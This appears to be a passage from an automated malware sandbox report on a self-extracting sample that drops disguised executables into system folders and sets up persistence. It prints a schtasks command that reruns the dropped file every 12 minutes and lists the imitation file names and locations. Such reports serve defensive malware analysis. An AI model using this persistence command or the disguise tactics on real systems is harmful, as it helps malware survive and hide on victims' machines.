              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: version.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: wldp.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: profapi.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: amsi.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: userenv.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: propsys.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: edputil.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: netutils.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: slc.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: sppc.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\ProgramData\ssh\System.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Recovery\Idle.exe Section loaded: mscoree.dll
              Source: C:\Recovery\Idle.exe Section loaded: apphelp.dll
              Source: C:\Recovery\Idle.exe Section loaded: kernel.appcore.dll
              Source: C:\Recovery\Idle.exe Section loaded: version.dll
              Source: C:\Recovery\Idle.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Recovery\Idle.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Recovery\Idle.exe Section loaded: uxtheme.dll
              Source: C:\Recovery\Idle.exe Section loaded: windows.storage.dll
              Source: C:\Recovery\Idle.exe Section loaded: wldp.dll
              Source: C:\Recovery\Idle.exe Section loaded: profapi.dll
              Source: C:\Recovery\Idle.exe Section loaded: cryptsp.dll
              Source: C:\Recovery\Idle.exe Section loaded: rsaenh.dll
              Source: C:\Recovery\Idle.exe Section loaded: cryptbase.dll
              Source: C:\Recovery\Idle.exe Section loaded: sspicli.dll
              Source: C:\Recovery\Idle.exe Section loaded: amsi.dll
              Source: C:\Recovery\Idle.exe Section loaded: userenv.dll
              Source: C:\Recovery\Idle.exe Section loaded: wbemcomn.dll
              Source: C:\Recovery\Idle.exe Section loaded: iphlpapi.dll
              Source: C:\Recovery\Idle.exe Section loaded: dnsapi.dll
              Source: C:\Recovery\Idle.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Recovery\Idle.exe Section loaded: dhcpcsvc.dll
              Source: C:\Recovery\Idle.exe Section loaded: winnsi.dll
              Source: C:\Recovery\Idle.exe Section loaded: rasapi32.dll
              Source: C:\Recovery\Idle.exe Section loaded: rasman.dll
              Source: C:\Recovery\Idle.exe Section loaded: rtutils.dll
              Source: C:\Recovery\Idle.exe Section loaded: mswsock.dll
              Source: C:\Recovery\Idle.exe Section loaded: winhttp.dll
              Source: C:\Recovery\Idle.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Recovery\Idle.exe Section loaded: rasadhlp.dll
              Source: C:\Recovery\Idle.exe Section loaded: fwpuclnt.dll
              Source: C:\Recovery\Idle.exe Section loaded: winmm.dll
              Source: C:\Recovery\Idle.exe Section loaded: winmmbase.dll
              Source: C:\Recovery\Idle.exe Section loaded: mmdevapi.dll
              Source: C:\Recovery\Idle.exe Section loaded: devobj.dll
              Source: C:\Recovery\Idle.exe Section loaded: ksuser.dll
              Source: C:\Recovery\Idle.exe Section loaded: avrt.dll
              Source: C:\Recovery\Idle.exe Section loaded: audioses.dll
              Source: C:\Recovery\Idle.exe Section loaded: powrprof.dll
              Source: C:\Recovery\Idle.exe Section loaded: umpdc.dll
              Source: C:\Recovery\Idle.exe Section loaded: msacm32.dll
              Source: C:\Recovery\Idle.exe Section loaded: midimap.dll
              Source: C:\Recovery\Idle.exe Section loaded: netfxperf.dll
              Source: C:\Recovery\Idle.exe Section loaded: pdh.dll
              Source: C:\Recovery\Idle.exe Section loaded: wtsapi32.dll
              Source: C:\Recovery\Idle.exe Section loaded: bitsperf.dll
              Source: C:\Recovery\Idle.exe Section loaded: secur32.dll
              Source: C:\Recovery\Idle.exe Section loaded: schannel.dll
              Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
              Source: C:\Recovery\Idle.exe Section loaded: mscoree.dll
              Source: C:\Recovery\Idle.exe Section loaded: kernel.appcore.dll
              Source: C:\Recovery\Idle.exe Section loaded: version.dll
              Source: C:\Recovery\Idle.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Recovery\Idle.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Recovery\Idle.exe Section loaded: uxtheme.dll
              Source: C:\Recovery\Idle.exe Section loaded: windows.storage.dll
              Source: C:\Recovery\Idle.exe Section loaded: wldp.dll
              Source: C:\Recovery\Idle.exe Section loaded: profapi.dll
              Source: C:\Recovery\Idle.exe Section loaded: cryptsp.dll
              Source: C:\Recovery\Idle.exe Section loaded: rsaenh.dll
              Source: C:\Recovery\Idle.exe Section loaded: cryptbase.dll
              Source: C:\Recovery\Idle.exe Section loaded: sspicli.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: mscoree.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: apphelp.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: kernel.appcore.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: version.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: uxtheme.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: windows.storage.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: wldp.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: profapi.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: cryptsp.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: rsaenh.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: cryptbase.dll
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\6uPVRnocVS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\ProgramData\ssh\System.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\ProgramData\ssh\System.exe Directory created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exe Directory created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\bc31d5a79a9161
              Source: C:\ProgramData\ssh\System.exe Directory created: C:\Program Files\Windows Defender\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exe Directory created: C:\Program Files\Windows Defender\bc31d5a79a9161
              Source: 6uPVRnocVS.exe Static file information: File size 2180702 > 1048576
              Source: 6uPVRnocVS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 6uPVRnocVS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 6uPVRnocVS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 6uPVRnocVS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 6uPVRnocVS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 6uPVRnocVS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 6uPVRnocVS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 6uPVRnocVS.exe
              Source: Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp
              Source: 6uPVRnocVS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 6uPVRnocVS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 6uPVRnocVS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 6uPVRnocVS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 6uPVRnocVS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\6uPVRnocVS.exe File created: C:\ProgramData\ssh\__tmp_rar_sfx_access_check_4245062
              Source: 6uPVRnocVS.exe Static PE information: section name: .didat
              Source: C:\Users\user\Desktop\6uPVRnocVS.exe Code function: 0_2_0010E28C push eax; ret 0_2_0010E2AA
              Source: C:\Users\user\Desktop\6uPVRnocVS.exe Code function: 0_2_0010CAC9 push eax; retf 0010h 0_2_0010CACE
              Source: C:\Users\user\Desktop\6uPVRnocVS.exe Code function: 0_2_0010ED46 push ecx; ret 0_2_0010ED59
              Source: C:\ProgramData\ssh\System.exe Code function: 4_2_00007FFD9BAB2C8D pushad ; retf 4_2_00007FFD9BAB2CC1
              Source: C:\Recovery\Idle.exe Code function: 30_2_00007FFD9BA9C720 pushfd ; iretd 30_2_00007FFD9BAA2BC2
              Source: C:\Recovery\Idle.exe Code function: 30_2_00007FFD9BAA2B08 pushfd ; iretd 30_2_00007FFD9BAA2BC2
              Source: C:\Recovery\Idle.exe Code function: 30_2_00007FFD9BAA2A59 pushfd ; iretd 30_2_00007FFD9BAA2BC2
              Source: C:\Recovery\Idle.exe Code function: 30_2_00007FFD9BA92C98 pushad ; retf 30_2_00007FFD9BA92CC1
              Source: C:\Recovery\Idle.exe Code function: 30_2_00007FFD9BA92CB8 pushad ; retf 30_2_00007FFD9BA92CC1
              Source: C:\Recovery\Idle.exe Code function: 30_2_00007FFD9BA92CA8 pushad ; retf 30_2_00007FFD9BA92CC1
              Source: C:\Recovery\Idle.exe Code function: 33_2_00007FFD9BAC2BDD pushfd ; iretd 33_2_00007FFD9BAC2BE2
              Source: C:\Recovery\Idle.exe Code function: 33_2_00007FFD9BAB2C8D pushad ; retf 33_2_00007FFD9BAB2CC1
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Code function: 34_2_00007FFD9BAC2C8D pushad ; retf 34_2_00007FFD9BAC2CC1
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Code function: 36_2_00007FFD9BAD2C8D pushad ; retf 36_2_00007FFD9BAD2CC1
              Source: System.exe.0.dr Static PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe.4.dr Static PE information: section name: .text entropy: 7.45249791422668
              Source: WmiPrvSE.exe.4.dr Static PE information: section name: .text entropy: 7.45249791422668
              Source: Idle.exe.4.dr Static PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe0.4.dr Static PE information: section name: .text entropy: 7.45249791422668
              Source: upfc.exe.4.dr Static PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe1.4.dr Static PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe2.4.dr Static PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe3.4.dr Static PE information: section name: .text entropy: 7.45249791422668
              Source: WinStore.App.exe.4.dr Static PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe4.4.dr Static PE information: section name: .text entropy: 7.45249791422668
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe5.4.dr Static PE information: section name: .text entropy: 7.45249791422668

              Persistence and Installation Behavior

              Source: C:\ProgramData\ssh\System.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\ProgramData\ssh\System.exe File created: C:\Recovery\upfc.exe
              Source: C:\ProgramData\ssh\System.exe File created: C:\Recovery\Idle.exe
              Source: C:\ProgramData\ssh\System.exe File created: C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exe File created: C:\Users\Default\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exe File created: C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\Users\user\Desktop\6uPVRnocVS.exe File created: C:\ProgramData\ssh\System.exe
              Source: C:\ProgramData\ssh\System.exe File created: C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exe File created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe
              Source: C:\ProgramData\ssh\System.exe File created: C:\Program Files (x86)\Windows Sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exe File created: C:\Program Files\Windows Defender\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exe File created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exe File created: C:\Windows\LiveKernelReports\WinStore.App.exe

              Boot Survival

              Source: C:\ProgramData\ssh\System.exe File created: C:\Users\Default\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\Recovery\Idle.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\Linkage
              Source: C:\Recovery\Idle.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\Linkage
              Source: C:\Users\user\Desktop\6uPVRnocVS.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\ssh\System.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Recovery\Idle.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
